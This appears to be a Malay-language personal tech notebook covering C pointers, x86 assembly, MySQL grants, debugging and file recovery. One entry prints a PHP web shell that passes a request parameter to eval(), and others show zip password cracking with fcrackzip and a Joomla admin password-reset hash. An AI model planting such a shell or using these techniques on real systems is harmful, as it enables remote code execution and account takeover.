char array vs char pointer

char j2[100] = "adam:Aku darah anak malaysia";
char *j3;

j3 = j2 ;
printf("&j2=%p j2=%p\n",&j2, j2);
printf("&j3=%p  j3=%x\n", &j3, j3);

>>:

&j2=0x7fff1b810fc0 j2=0x7fff1b810fc0
&j3=0x7fff1b810fb8  j3=1b810fc0



#di compile dan run atas 64bit OS.
&j2 sama dgn j2 dan j3.
&j3 adalah lokasi dimana alamat j2 disimpan.

string.h (c)

1) strcmp
bil = strcmp(char *strA, char *strB);
if (bil == 0){
>> strA = strB
}



2) strstr
char *s1 = "amanamanam";
char *s2 = "ana";
char *s3;

s3 = strstr(s1, s2);
printf("%p - %p = %f\n",s3, s1, (double)(s3 - s1));
>>>>0x40085e - 0x40085c = 2.000000

bit, byte, word

1nible = 4 bit
1byte = 8 bit
1word = 2 byte = 16 bit
1dword = 4byte = 32 bit


ps:/ setiap alamat dalam memory boleh isi 8 bit

retn

retn >> pop eip

retn 10 >> pop eip,
           >> add esp,10h

Contoh:
1-Mula seperti dibawah.

Sebelum RETN 14 (alamat 76E0BFA9), ESP = 001BFA18. 
RET 14 >>
- POP EIP
- ADD ESP 14

2- Hasilnya, perubahan berlaku pada EIP dan ESP.

- POP EIP akan menyebabkan ESP bertukar kepada 001BFA1C. 

- SUB ESP, 14 >>  ESP = 001BFA1C + 14 = 001BFA30

seperti dibawah:

jump if overflow

assembly:
jo > jump if overflow

Tapi ni bukan stack overflow. Dia rujuk kepada flag overflow(O) kat CPU.
Flag ni aktif kalau hasil kira2 terakhir, nilainya terlalu besar utk simpan dalam register.


[false alarm.]

mysql create user

GRANT ALL PRIVILEGES ON `dbName`.* TO 'mysqluser'@'localhost' WITH GRANT OPTION ;



Detail:
CREATE USER 'new-username'@'localhost' IDENTIFIED BY 'new-password';
GRANT ALL ON *.* TO 'new-username'@'localhost' WITH GRANT OPTION;

There is a list of privileges that you can grant to a user:

Privilege	Meaning
ALL [PRIVILEGES]	Sets all simple privileges except GRANT OPTION
ALTER	Enables use of ALTER TABLE
CREATE	Enables use of CREATE TABLE
CREATE TEMPORARY TABLES	Enables use of CREATE TEMPORARY TABLE
DELETE	Enables use of DELETE
DROP	Enables use of DROP TABLE
EXECUTE	Not implemented
FILE	Enables use of SELECT … INTO OUTFILE and LOAD DATA INFILE
INDEX	Enables use of CREATE INDEX and DROP INDEX
INSERT	Enables use of INSERT
LOCK TABLES	Enables use of LOCK TABLES on tables for which you have the SELECT privilege
PROCESS	Enables the user to see all processes with SHOW PROCESSLIST
REFERENCES	Not implemented
RELOAD	Enables use of FLUSH
REPLICATION CLIENT	Enables the user to ask where slave or master servers are
REPLICATION SLAVE	Needed for replication slaves (to read binary log events from the master)
SELECT	Enables use of SELECT
SHOW DATABASES	SHOW DATABASES shows all databases
SHUTDOWN	Enables use of MySQLadmin shutdown
SUPER	Enables use of CHANGE MASTER, KILL, PURGE MASTER LOGS, and SET GLOBAL statements, the MySQLadmin debug command; allows you to connect (once) even if max_connections is reached
UPDATE	Enables use of UPDATE
USAGE	Synonym for “no privileges”
GRANT OPTION	Enables privileges to be granted

ref: http://stuntsnippets.com/mysql-create-new-user/

pyHook

Cara nak guna pyHook dalam Immunity Debugger

1- Simpan kod di bawah dalam dir ~pathToImmunityDebugger\PyCommands\mhcubaHook.py

mhcubaHook.py

• line 17-18: nama hook mesti berlainan.

2- Buka Immunity Debugger dan File->Open sebarang fail exe.

3- Taip !mhcubaHook  dan [enter] dalam command box(pada bahagian bawah I.D. Akan dapati warna latar pada alamat 00401012 bertukar warna pink. Ini kerana arahan 'myhook.add(alamat)' .

4- Tekan butang F9(atau Debug->Run)

5- Klik menu Window-Log utk lihat hasilnya

recover delete file

sudo dd if=/dev/mmcblk0p1 of=myCard.img bs=512

photorec myCard.img

ref: http://goinggnu.wordpress.com/2008/02/14/recover-deleted-files-from-memory-card/

select into outfile

SELECT * INTO OUTFILE "/backup/books/allbooks.txt"
FIELDS TERMINATED BY '\t' LINES TERMINATED BY '\n'
FROM books;

ref:
http://www.mysqlfaqs.net/mysql-faqs/Data-Back-Up/Export-Data/How-to-use-SELECT-INTO-OUTFILE-statement-to-export-data

mysqldump tanpa lock tables

mysqldump --lock-tables=false  -h komar.asia -u nama -ppassword database  > namaTable.sql

save mms stream

http://forum.videohelp.com/threads/257045-How-to-record-streaming-WMV-ASF-MMS-links-using-VLC-Media-Player

reset joomla 1.6 admin password

ganti field password kepada:

 d2064d358136996bd22421584a7cb33e:trd7TvKHx6dMeoMmBVxYmg0vuXEA4199

seterusnya, login guna password secret.

masalah codec libraray

tiba-tiba media player(vlc) tak support byk format. avidemux pun sama, format yg di suppoprt menjadi kurang.

kat bawah ni cara nak selesaikan masalah.

---------------------------------------
I just solved my vlc video problems. It appears that the culprit was the getdeb repository that I had recently added. I commented out that repo and downgraded several packages - libavcodec-extra-52, libavdevice-extra-52 etc. The most important one seems to be libva1.

In case anyone needs detailed version information for some packages, I will be happy to post.


----------------------------
Open synaptic, search ffmpeg, and remove all installed ffmpeg libraires, starting with libavcodec* down to libswscale*

You'll lose some players and a plugin or 2, no matter, they can be reinstalled. (in synaptic, file -> history will show you

Then install some players and libxine1-ffmpeg and see.


ref:http://ubuntuforums.org/archive/index.php/t-1544929.html

pfctl bsd

susah betul nak ingat BSD ni.

pfctl -n -f /etc/pf.conf

cmp, jl, jg

cmp eax,5
bermaksud: eax - 5


mv eax, 4
cmp eax, 5
; > je -> tak
; > jl -> ya
; > jg -> tak

mv eax, 4
cmp eax, 4
; > je -> ya
; > jl -> tak
; > jg -> tak

mv eax, 4
cmp eax, 3
; > je -> tak
; > jl -> tak
; > jg -> ya


Flag Register
Bit 6: Zero -->> kalau cmp 5,5 -->> Z flag = 1
Bit 7: Sign -->> negatif sign, kalau cmp 1,2 -->>flag = 1

print poster atas kertas a4

ubuntu$ pdfposter -s 1  asal.pdf baru.pdf

asal.pdf adalah fail yg bersaiz besar, cuma satu muka surat.
baru.pdf fail saiz a4, tapi banyak muka surat.

print baru.pdf dan sambungkan kertas a4 menjadi poster yg besar

mencari ROP(return-oriented programming)

1- berhenti bila jumpa 'retn'
2- kalau 20 nilai teratas pada stack menunjuk kepada executable area dalam memori, besar kemungkinan ada ROP attempt.

teknik baru rfi

 

<?php
	if(isset($_REQUEST["code_str"])){
	eval(stripslashes($_REQUEST["code_str"]));
	} else {
	exit(999 * 4 . " The Roof Is On Fire");
	}
	?>

pin what???

rasanya pin(http://www.pintool.org/) ni boleh ganti hooking.

Contoh penggunaan adalah utk log kan setiap arahan opcode yg process jalankan.

Satu lagi alternatif ialah DynamoRIO(http://groups.csail.mit.edu/cag/dynamorio/)


ref: http://blog.zynamics.com/2010/07/28/dumping-shellcode-with-pin/

tebuk fail zip guna fcrackzip

$ zip --encrypt -r secret secret/
(creating secret.zip)


$ fcrackzip -u -c a -p aaaaa secret.zip
PASSWORD FOUND!!!!: pw == linux






ref http://linuxers.org/article/how-crack-zip-file-passwords-linux-using-fcrackzip

setiap alamat ada 8 bit

setiap alamat dalam memori boleh isi 8 bit.

eg:
alamat            nilai(dlm hexadecimal)
---------------   -------------
0x00102000: 41 44
0x00102001: 41 20
0x00102002: 42 41  43 41
0x00102004: 00

• [1- for dummies: kenapa 0x00102003 tiada kat atas?]
• [2- kalau char * str = 0x102000, printf("%s", str) dapat apa? ]

4 bit  boleh simpan 16 nilai berbeza
dlm hexadecimal    0x0 - 0xF

8 bit(1 byte) >> 0x00 - 0xFF

cmp (opcode)

cmp eax, ebx
>>

eax - ebx = y

kalau y == 0, ZF = 1 (True)
kalau y !=0,  ZF = 0 (False)

Assembly Leave Retn

LEAVE =>  POP EBP

RETN =>  POP EIP

VirtualProtect

Dalam Immunity Debugger-> Memory Map

Asal
Memory map, item 13
 Address=00401000
 Size=0000F000 (61440.)
 Owner=setup279 00400000
 Section=.text
 Contains=code
 Type=Imag 01001002
 Access=R E
 Initial access=RWE

Call Virtual Protect API

0040F253  |. 50             PUSH EAX                                          ; /pOldProtect

0040F254  |. 6A 40          PUSH 40                                           ; |NewProtect = PAGE_EXECUTE_READWRITE

0040F256  |. 52             PUSH EDX                                          ; |Size

0040F257  |. 68 00104000    PUSH setup279.00401000                            ; |Address = setup279.00401000

0040F25C  |. E8 1F000000    CALL <JMP.&kernel32.VirtualProtect>               ; \VirtualProtect

 Result

Memory map, item 13
 Address=00401000
 Size=0000F000 (61440.)
 Owner=setup279 00400000
 Section=.text
 Contains=code
 Type=Imag 01001002
 Access=RWE CopyOnWr
 Initial access=RWE

Perubahan pada field Access, dari [R E]  kepada [RWE CopyOnWr]

Bismillah

Dimulakan dengan nama Allah yang Maha Pemurah dan Maha Mengasihani.
Serta selawat dan salam untuk nabi Muhammad(SAW)